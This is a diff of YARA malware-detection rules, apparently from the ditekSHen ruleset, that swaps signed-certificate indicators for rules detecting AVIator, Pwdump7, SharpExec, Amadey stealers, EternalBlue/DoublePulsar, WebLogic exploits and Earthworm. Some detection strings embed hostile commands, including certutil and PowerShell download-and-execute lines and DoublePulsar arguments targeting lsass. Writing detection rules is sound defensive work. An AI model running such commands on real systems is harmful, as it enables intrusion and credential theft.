-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x88\\x90\\xE9\\x83\\xBD\\xE5\\x90\\x89\\xE8\\x83\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE8\\xB4\\xA3\\xE4\\xBB\\xBB\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "23:04:ec:f0:ea:2b:27:36:be:dd:d2:6a:90:3b:a9:52" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4D78E90E0950Fc630000000055657E1A : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Avbypass_Aviator : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects AVIator, which is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. This was observed to bypass Win.Trojan.AZorult. This rule works for binaries and memory."
 		author = "ditekSHen"
-		id = "bb48d309-e7b8-5c39-b989-cce4093b2082"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "2bddd64e-baca-58cb-ba52-27487cc4ded5"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2770-L2781"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L214-L240"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c2a3714173defa7b8e97ea92f8f85fb47011099bdc24067aafa273ebdd282f0f"
+		logic_hash = "1fb497eec2b0cd4051b5ddd53463f1da511c0a7b72d54a0bc68736a99fdc6143"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "fd010fdee2314f5d87045d1d7bf0da01b984b0fe"
-		importance = 20
+
+	strings:
+		$s1 = "msfvenom -p windows/meterpreter" ascii wide
+		$s2 = "payloadBox.Text" ascii wide
+		$s3 = "APCInjectionCheckBox" ascii wide
+		$s4 = "Thread Hijacking (Shellcode Arch: x86, OS Arch: x86)" ascii wide
+		$s5 = "injectExistingApp.Text" ascii wide
+		$s6 = "Stable execution but can be traced by most AVs" ascii wide
+		$s7 = "AV/\\tor" ascii wide
+		$s8 = "AvIator.Properties.Resources" ascii wide
+		$s9 = "Select injection technique" ascii wide
+		$s10 = "threadHijacking_option" ascii wide
+		$pwsh1 = "Convert.ToByte(Payload_Encrypted_Without_delimiterChar[" ascii wide
+		$pwsh2 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" ascii wide
+		$pwsh3 = "IntPtr RtlAdjustPrivilege(" ascii wide
+		$pwsh4 = /InjectShellcode\.(THREADENTRY32|CONTEXT64|WriteProcessMemory\(|CloseHandle\(|CONTEXT_FLAGS|CONTEXT\(\);|Thread32Next\()/ ascii wide
+		$pwsh5 = "= Payload_Encrypted.Split(',');" ascii wide
+		$pwsh6 = "namespace NativePayload_Reverse_tcp" ascii wide
+		$pwsh7 = "byte[] Finall_Payload = Decrypt(KEY, _X_to_Bytes);" ascii wide
+		$pwsh8 = /ConstantsAndExtCalls\.(WriteProcessMemory\(|CreateRemoteThread\()/ ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Telus Health Solutions Inc." and pe.signatures [ i ] . serial == "4d:78:e9:0e:09:50:fc:63:00:00:00:00:55:65:7e:1a" )
+		( uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 2 of ( $pwsh* ) ) ) or ( 3 of ( $s* ) or 2 of ( $pwsh* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0092Bc051F1811Bb0B86727C36394F7849 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Pwdump7 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Pwdump7 password Dumper"
 		author = "ditekSHen"
-		id = "9ffef880-ed00-54a7-8eb2-995c5c4e74f1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "dc6ff544-b9de-547b-9fa8-7d0b32e9592d"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2783-L2794"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L242-L254"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bdf847f95bc6cc50513b76c57c3e76bc17caacd3419baabb2cab0161feb67508"
+		logic_hash = "f84ab69ecc6837a826dc8726785165b8135edf51a47fb5bbaf19dc589b3032bd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d1f9930521e172526a9f018471d4575d60d8ad8f"
-		importance = 20
+
+	strings:
+		$s1 = "savedump.dat" fullword ascii
+		$s2 = "Asd -_- _RegEnumKey fail!" fullword ascii
+		$s3 = "\\SAM\\" ascii
+		$s4 = "Unable to dump file %S" fullword ascii
+		$s5 = "NO PASSWORD" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MISTO EKONOMSKE STORITVE, d.o.o." and pe.signatures [ i ] . serial == "00:92:bc:05:1f:18:11:bb:0b:86:72:7c:36:39:4f:78:49" )
+		( uint16( 0 ) == 0x5a4d and 4 of them ) or ( all of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_B4F42E2C153C904Fda64C957Ed7E1028 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_LTM_Sharpexec : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SharpExec lateral movement tool"
 		author = "ditekSHen"
-		id = "d284b7f0-9728-5755-87d5-f8251903e778"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4373a052-9525-5b24-81a4-65cd68afcb6c"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2796-L2807"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L256-L275"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d47f85602234eae7629b778b09ed5c3656c6afa8b6a7ba42cc46f451202a16c0"
+		logic_hash = "17ae5c9f0b22e8ecbbbcbe052e466d00cb7b62cff423688b5138209c52f0698d"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "ed4c50ab4f173cf46386a73226fa4dac9cadc1c4"
-		importance = 20
+
+	strings:
+		$s1 = "fileUploaded" fullword ascii
+		$s2 = "$7fbad126-e21c-4c4e-a9f0-613fcf585a71" fullword ascii
+		$s3 = "DESKTOP_HOOKCONTROL" fullword ascii
+		$s4 = /WINSTA_(ACCESSCLIPBOARD|WINSTA_ALL_ACCESS)/ fullword ascii
+		$s5 = /NETBIND(ADD|DISABLE|ENABLE|REMOVE)/ fullword ascii
+		$s6 = /SERVICE_(ALL_ACCESS|WIN32_OWN_PROCESS|INTERROGATE)/ fullword ascii
+		$s7 = /(Sharp|PS|smb)Exec/ fullword ascii
+		$s8 = "lpszPassword" fullword ascii
+		$s9 = "lpszDomain" fullword ascii
+		$s10 = "wmiexec" fullword ascii
+		$s11 = "\\C$\\__LegitFile" wide
+		$s12 = "LOGON32_LOGON_NEW_CREDENTIALS" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NONO spol. s r.o." and pe.signatures [ i ] . serial == "b4:f4:2e:2c:15:3c:90:4f:da:64:c9:57:ed:7e:10:28" )
+		( uint16( 0 ) == 0x5a4d and 9 of them ) or ( all of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ac307E5257Bb814B818D3633B630326F : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PRV_Advancedrun : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects NirSoft AdvancedRun privialge escalation tool"
 		author = "ditekSHen"
-		id = "b6d6c195-cd02-5ecd-82f3-348ab6f26eb5"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c886951a-7ee9-5d38-a724-3dbba8c6ec31"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2809-L2820"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L277-L289"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f187d3084eb189cdd0e858aed1d9589d586f369b128679c6c1dec860e544f326"
+		logic_hash = "3f39e8f0629647f44a2f473d7b49a8b6adb1acd62de36420b80e7820e63854bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4d6a089ec4edcac438717c1d64a8be4ef925a9c6"
-		importance = 20
+
+	strings:
+		$s1 = "RunAsProcessName" fullword wide
+		$s2 = "Process ID/Name:" fullword wide
+		$s3 = "swinsta.dll" fullword wide
+		$s4 = "User of the selected process0Child of selected process (Using code injection) Specified user name and password" fullword wide
+		$s5 = "\"Current User - Allow UAC Elevation$Current User - Without UAC Elevation#Administrator (Force UAC Elevation)" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aqua Direct s.r.o." and pe.signatures [ i ] . serial == "00:ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_063A7D09107Eddd8Aa1F733634C6591B : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Amady : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects password stealer DLL. Dropped by Amadey"
 		author = "ditekSHen"
-		id = "489daa61-8409-500d-bc46-a42a444fcdc0"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "6ee4e25b-bf38-5664-a08f-94e3fa92aa29"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2822-L2833"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L291-L306"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8b6c1935d51207e6b9919c85d369dcc6963f52ee4d21758d18e2c57115e9051b"
+		logic_hash = "409374bec5f58abeb7741b41f0fc7ea1c3fdc7bbc3f0c0628db0e3aac82836d1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a03f9b3f3eb30ac511463b24f2e59e89ee4c6d4a"
-		importance = 20
+
+	strings:
+		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\AppData" fullword ascii
+		$s2 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook" ascii
+		$s3 = "\\Mikrotik\\Winbox\\Addresses.cdb" fullword ascii
+		$s4 = "\\HostName" fullword ascii
+		$s5 = "\\Password" fullword ascii
+		$s6 = "SOFTWARE\\RealVNC\\" ascii
+		$s7 = "SOFTWARE\\TightVNC\\" ascii
+		$s8 = "cred.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Smart Line Logistics" and pe.signatures [ i ] . serial == "06:3a:7d:09:10:7e:dd:d8:aa:1f:73:36:34:c6:59:1b" )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4C687A0022C36F89E253F91D1F6954E2 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_SCR_Amady : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects screenshot stealer DLL. Dropped by Amadey"
 		author = "ditekSHen"
-		id = "d4b03832-60f2-5342-8186-3e6c3d7eeb63"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "f7660899-ed12-5765-a856-6a1c7bbd8978"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2835-L2846"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L308-L320"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0bcbe8c85f02735378b5be95c098ca5088f451e390ec6ce76fb732f0db297c1f"
+		logic_hash = "9e7ab39976e3219f0c6c3ce5341442343cc4baf30757cd1c9d0c2d3845fdda2f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4412007ae212d12cea36ed56985bd762bd9fb54a"
-		importance = 20
+
+	strings:
+		$s1 = "User-Agent: Uploador" fullword ascii
+		$s2 = "Content-Disposition: form-data; name=\"data\"; filename=\"" fullword ascii
+		$s3 = "WebUpload" fullword ascii
+		$s4 = "Cannot assign a %s to a %s%List does not allow duplicates ($0%x)%String" wide
+		$s5 = "scr.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HETCO ApS" and pe.signatures [ i ] . serial == "4c:68:7a:00:22:c3:6f:89:e2:53:f9:1d:1f:69:54:e2" )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3Cee26C125B8C188F316C3Fa78D9C2F1 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_EXP_Eternalblue : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Windows executables containing EternalBlue explitation artifacts"
 		author = "ditekSHen"
-		id = "d9271a74-1a04-5863-afc6-4b1d2982f680"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "08173a1e-2e32-5add-864a-d92ffa0a3e44"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2848-L2859"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L322-L342"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "673a275a6d899b5de66d80cb55fa6438c2e14c70a96ba8461eb4946e1f4b4dfa"
+		logic_hash = "63e56637118accb8c32c20e52465c027df2dbf83b3b663d316b453ce879572c8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9efcf68a289d9186ec17e334205cb644c2b6a147"
-		importance = 20
+
+	strings:
+		$ci1 = "CNEFileIO_" ascii wide
+		$ci2 = "coli_" ascii wide
+		$ci3 = "mainWrapper" ascii wide
+		$dp1 = "EXPLOIT_SHELLCODE" ascii wide
+		$dp2 = "ETERNALBLUE_VALIDATE_BACKDOOR" ascii wide
+		$dp3 = "ETERNALBLUE_DOUBLEPULSAR_PRESENT" ascii wide
+		$dp4 = "//service[name='smb']/port" ascii wide
+		$dp5 = /DOUBLEPULSAR_(PROTOCOL_|ARCHITECTURE_|FUNCTION_|DLL_|PROCESS_|COMMAND_|IS_64_BIT)/
+		$cm1 = "--DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll" ascii wide
+		$cm2 = "--DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll" ascii wide
+		$cm3 = "--DaveProxyPort=0 --NetworkTimeout 30 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bitubit LLC" and pe.signatures [ i ] . serial == "3c:ee:26:c1:25:b8:c1:88:f3:16:c3:fa:78:d9:c2:f1" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $ci* ) ) or ( 2 of ( $dp* ) ) or ( 1 of ( $dp* ) and 1 of ( $ci* ) ) or ( 1 of ( $cm* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_A0A27Aefd067Ac62Ce0247B72Bf33De3 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_EXP_Weblogic : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Windows executables containing Weblogic exploits commands"
 		author = "ditekSHen"
-		id = "1e8db3c4-8d32-5a8d-96ac-785d8f703c7d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e761a968-35cb-5284-99f2-6d516ad348e3"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2861-L2872"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L344-L353"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c49e1d8b1a2d0e27fd25574ce587f60770ecac75c1db437bf7538d2ff47c8d4c"
+		logic_hash = "01855f1125b0ba87dd40f7d460440dbda2d75c8b484e842a2b2e20c089b4ab5e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "42c2842fa674fdca14c9786aaec0c3078a4f1755"
-		importance = 20
+
+	strings:
+		$s1 = "certutil.exe -urlcache -split -f AAAAA BBBBB & cmd.exe /c BBBBB" ascii
+		$s2 = "powershell (new-object System.Net.WebClient).DownloadFile('AAAAA','BBBBB')" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cfbcdabfdbdccaaccadfeaacacf" and pe.signatures [ i ] . serial == "a0:a2:7a:ef:d0:67:ac:62:ce:02:47:b7:2b:f3:3d:e3" )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Eee8Cf0A0E4C78Faa03D07470161A90E : FILE
+rule DITEKSHEN_INDICATOR_TOOL_SCN_Smbtouch : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SMBTouch scanner EternalBlue, EternalChampion, EternalRomance, EternalSynergy"
 		author = "ditekSHen"
-		id = "a91c84db-99b4-5e24-ba8a-4e009219eb05"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4e8176dd-4113-5fa8-a695-77e7169f6975"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2874-L2885"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L376-L400"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c14eeeab8cf9797499d23f451a695b443ecc8d3ebbc2edb830ae450e444178c"
+		logic_hash = "78c2a435762d3febe927eb15910d5a18c1ffe74604673463543d3c859f5ef8e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "32eda5261359e76a4e66da1ba82db7b7a48295d2"
-		importance = 20
+
+	strings:
+		$s1 = "[+] SMB Touch started" fullword ascii
+		$s2 = "[-] Could not connect to share (0x%08X - %s)" fullword ascii
+		$s3 = "[!] Target could be either SP%d or SP%d," fullword ascii
+		$s4 = "[!] for these SMB exploits they are equivalent" fullword ascii
+		$s5 = "[+] Target is vulnerable to %d exploit%s" fullword ascii
+		$s6 = "[+] Touch completed successfully" fullword ascii
+		$s7 = "Network error while determining exploitability" fullword ascii
+		$s8 = "Named pipe or share required for exploit" fullword ascii
+		$w1 = "UsingNbt" fullword ascii
+		$w2 = "TargetPort" fullword ascii
+		$w3 = "TargetIp" fullword ascii
+		$w4 = "RedirectedTargetPort" fullword ascii
+		$w5 = "RedirectedTargetIp" fullword ascii
+		$w6 = "NtlmHash" fullword ascii
+		$w7 = "\\PIPE\\LANMAN" fullword ascii
+		$w8 = "UserRejected: " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aafabffdbdbcbfcaebdf" and pe.signatures [ i ] . serial == "ee:e8:cf:0a:0e:4c:78:fa:a0:3d:07:47:01:61:a9:0e" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or all of ( $w* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_79E1Cc0F6722E1A2C4647C21023Ca4Ee : FILE
+rule DITEKSHEN_INDICATOR_TOOL_SCN_Nbtscan : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects NBTScan scanner for open NETBIOS nameservers on a local or remote TCP/IP network"
 		author = "ditekSHen"
-		id = "0abbd882-0224-5c94-98b2-870853344883"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "663c324e-4784-5efe-bbdf-60fa42e13944"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2887-L2898"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L402-L420"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9d0c02ae3eab7f7c28dba04cd08fdddef2be64a1622d7fb519a4bf3a40ef19b1"
+		logic_hash = "a81b95ad60aac4d66586ae7dc61f6bcbe2b7185b66b2bb895f45abff3ad3f430"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "41d2f4f810a6edf42b3717cf01d4975476f63cba"
-		importance = 20
+
+	strings:
+		$s1 = "[%s] is an invalid target (bad IP/hostname)" fullword ascii
+		$s2 = "ERROR: no parse for %s -- %s" fullword ascii
+		$s3 = "add_target failed" fullword ascii
+		$s4 = "   -p <n>    bind to UDP Port <n> (default=%d)" fullword ascii
+		$s5 = "process_response.c" fullword ascii
+		$s6 = "currTarget != 0" fullword ascii
+		$s7 = "parse_target.c" fullword ascii
+		$s8 = "dump_packet.c" fullword ascii
+		$s9 = "parse_target_cb.c" fullword ascii
+		$s10 = "DUMP OF PACKET" fullword ascii
+		$s11 = "lookup_hostname.c" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPAGETTI LTD" and pe.signatures [ i ] . serial == "79:e1:cc:0f:67:22:e1:a2:c4:64:7c:21:02:3c:a4:ee" )
+		uint16( 0 ) == 0x5a4d and 10 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6D688Ecf46286Fe4B6823B91384Eca86 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_ENC_Bestcrypt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BestEncrypt commercial disk encryption and wiping software"
 		author = "ditekSHen"
-		id = "4718996b-cb42-5b83-8fdf-d87751302a00"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "30c3c17c-c951-5b14-80ba-eec7b2195985"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2900-L2911"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L442-L453"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "33296b5b9156af6d95bec9981a9fab3137bcd17bfb26ea2d212ae004275bf42e"
+		logic_hash = "77d338c6f3e4b733cb31eb1ae05e4ce8631812f7161bc70074a3fe1dee9df770"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "970205140b48d684d0dc737c0fe127460ccfac4f"
-		importance = 20
+
+	strings:
+		$s1 = "BestCrypt Volume Encryption" wide
+		$s2 = "BCWipe for " wide
+		$s3 = "Software\\Jetico\\BestCrypt" wide
+		$s4 = "%c:\\EFI\\Jetico\\" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AtomPark Software JSC" and pe.signatures [ i ] . serial == "6d:68:8e:cf:46:28:6f:e4:b6:82:3b:91:38:4e:ca:86" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_9Aa99F1B75A463460D38C4539Fae4F73 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_CNC_Earthworm : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Earthworm C&C Windows/macOS tool"
 		author = "ditekSHen"
-		id = "5ffad411-49e2-5691-95e7-1e294a2a101e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4a6edcf3-b3c4-5620-8eac-102b1ce425f8"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2913-L2924"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L455-L471"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b73c6ca2c0cd0e09f0add77c3af3c8e16f46cec29b49d4dcab5a569fed8d3d39"
+		logic_hash = "5045faaaa9e60d4bd506240d51ff78dad4e89ccee0e824e7e5c309a8d3ae2883"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "b2ea9e771631f95a927c29b044284ef4f84a2069"
-		importance = 20
+
+	strings:
+		$s1 = "lcx_tran 0.0.0.0:%d <--[%4d usec]--> %s:%d" fullword ascii
+		$s2 = "ssocksd 0.0.0.0:%d <--[%4d usec]--> socks server" fullword ascii
+		$s3 = "rcsocks 0.0.0.0:%d <--[%4d usec]--> 0.0.0.0:%d" fullword ascii
+		$s4 = "rssocks %s:%d <--[%4d usec]--> socks server" fullword ascii
+		$s5 = "--> %3d <-- (close)used/unused  %d/%d" fullword ascii
+		$s6 = "<-- %3d --> (open)used/unused  %d/%d" fullword ascii
+		$s7 = "--> %d start server" ascii
+		$s8 = "Error on connect %s:%d [proto_init_cmd_rcsocket]" fullword ascii
+		$url = "http://rootkiter.com/EarthWrom/" nocase fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beaacdfaeeccbbedadcb" and pe.signatures [ i ] . serial == "9a:a9:9f:1b:75:a4:63:46:0d:38:c4:53:9f:ae:4f:73" )
+		( uint16( 0 ) == 0xfacf or uint16( 0 ) == 0x5a4d ) and ( 5 of ( $s* ) or $url )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_E414655F025399Cca4D7225D89689A04 : FILE
